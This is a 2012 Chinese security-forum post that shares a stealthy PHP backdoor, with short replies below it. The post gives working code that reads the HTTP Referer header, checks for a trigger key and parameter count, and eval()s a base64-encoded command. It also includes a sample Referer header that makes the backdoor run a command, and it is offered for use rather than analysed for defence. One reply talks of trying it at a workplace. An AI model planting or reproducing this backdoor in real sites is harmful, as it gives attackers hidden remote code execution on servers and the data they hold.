首页
社区
课程
招聘
[分享]另类PHP Referer后门
发表于: 2012-2-25 12:02 2660

[分享]另类PHP Referer后门

2012-2-25 12:02
2660
通过HTTP请求中的Referer运行经过Base64编码的命令,达到后门效果。

--Code--
parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' &&
count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+",
join(array_slice($a,count($a)-3)))));echo '</star>';}
----------

在HTTP请求中的的Referer代码:
Referer: a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw==
其中&a0=后门接运行的命令的Base64编码,本地测试成功。

别人的测试截图:


原文地址:
http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/85118

[课程]FART 脱壳王!加量不加价!FART作者讲授!

收藏
免费 0
支持
分享
最新回复 (2)
雪    币: 117
活跃值: (102)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
星期一去公司试试。。。
2012-2-25 13:44
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
gie
3
谢谢分享了。
2012-2-29 00:09
0
游客
登录 | 注册 方可回帖
返回
//